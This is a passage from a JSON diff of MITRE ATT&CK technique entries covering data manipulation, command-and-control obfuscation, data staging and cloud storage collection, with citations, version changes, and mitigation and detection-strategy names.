+                    "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1565",
+                            "external_id": "T1565"
+                        },
+                        {
+                            "source_name": "Sygnia Elephant Beetle Jan 2022",
+                            "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.",
+                            "url": "https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Integrity"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-01-20 15:10:23.526000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1030: Network Segmentation",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0059: Detection Strategy for Data Manipulation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-02 14:27:00.693000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Transmitted Data Manipulation",
+                    "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1565/002",
+                            "external_id": "T1565.002"
+                        },
+                        {
+                            "source_name": "DOJ Lazarus Sony 2018",
+                            "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.",
+                            "url": "https://www.justice.gov/opa/press-release/file/1092091/download"
+                        },
+                        {
+                            "source_name": "FireEye APT38 Oct 2018",
+                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
+                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Integrity"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-11-13 19:21:05.133000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0254: Detection Strategy of Transmitted Data Manipulation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:18.931000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Data Obfuscation",
+                    "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1001",
+                            "external_id": "T1001"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Bitdefender FunnyDream Campaign November 2020",
+                            "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.",
+                            "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:13.380000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0053: Detect Obfuscated C2 via Network Traffic Analysis"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 00:30:25.444000+00:00",
+                    "modified": "2026-05-12 15:12:00.725000+00:00",
+                    "name": "Junk Data",
+                    "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1001/001",
+                            "external_id": "T1001.001"
+                        },
+                        {
+                            "source_name": "FireEye SUNBURST Backdoor December 2020",
+                            "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.725000+00:00\", \"old_value\": \"2025-10-24 17:49:38.011000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0011: Detecting Junk Data in C2 Channels via Behavioral Analysis"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 00:40:27.503000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Protocol or Service Impersonation",
+                    "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. \n\nAdversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation: Malleable-C2-U42)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1001/003",
+                            "external_id": "T1001.003"
+                        },
+                        {
+                            "source_name": "Malleable-C2-U42",
+                            "description": "Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved September 24, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "ESET Okrum July 2019",
+                            "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "James Emery-Callcott, Emerging Threats Team, Proofpoint"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2025-10-24 17:49:20.574000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0470: Detecting Protocol or Service Impersonation via Anomalous TLS, HTTP Header, and Port Mismatch Correlation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:58.938000+00:00",
+                    "modified": "2026-05-12 15:12:00.645000+00:00",
+                    "name": "Data Staged",
+                    "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1074",
+                            "external_id": "T1074"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        },
+                        {
+                            "source_name": "PWC Cloud Hopper April 2017",
+                            "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.",
+                            "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Shane Tully, @securitygypsy"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.645000+00:00\", \"old_value\": \"2025-10-24 17:49:01.010000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0014: Detection of Data Staging Prior to Exfiltration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 21:13:10.467000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Local Data Staging",
+                    "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nAdversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1074/001",
+                            "external_id": "T1074.001"
+                        },
+                        {
+                            "source_name": "Prevailion DarkWatchman 2021",
+                            "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.",
+                            "url": "https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Massimiliano Romano, BT Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:28.868000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0261: Detection of Local Data Staging Prior to Exfiltration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 21:14:58.206000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Remote Data Staging",
+                    "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1074/002",
+                            "external_id": "T1074.002"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2025-10-24 17:48:38.453000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0071: Detection of Remote Data Staging Prior to Exfiltration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-08-30 18:07:27.741000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Data from Cloud Storage",
+                    "description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1530",
+                            "external_id": "T1530"
+                        },
+                        {
+                            "source_name": "Amazon S3 Security, 2019",
+                            "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.",
+                            "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Storage Security, 2019",
+                            "description": "Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide"
+                        },
+                        {
+                            "source_name": "Wired Magecart S3 Buckets, 2019",
+                            "description": "Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains\u2014and Counting. Retrieved October 4, 2019.",
+                            "url": "https://www.wired.com/story/magecart-amazon-cloud-hacks/"
+                        },
+                        {
+                            "source_name": "Google Cloud Storage Best Practices, 2019",
+                            "description": "Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.",
+                            "url": "https://cloud.google.com/storage/docs/best-practices"
+                        },
+                        {
+                            "source_name": "HIPAA Journal S3 Breach, 2017",
+                            "description": "HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.",
+                            "url": "https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/"
+                        },
+                        {
+                            "source_name": "Rclone-mega-extortion_05_2021",
+                            "description": "Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.",
+                            "url": "https://redcanary.com/blog/rclone-mega-extortion/"
+                        },
+                        {
+                            "source_name": "Trend Micro S3 Exposed PII, 2017",
+                            "description": "Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.",
+                            "url": "https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Netskope",
+                        "Praetorian",
+                        "AppOmni",
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "2.2",
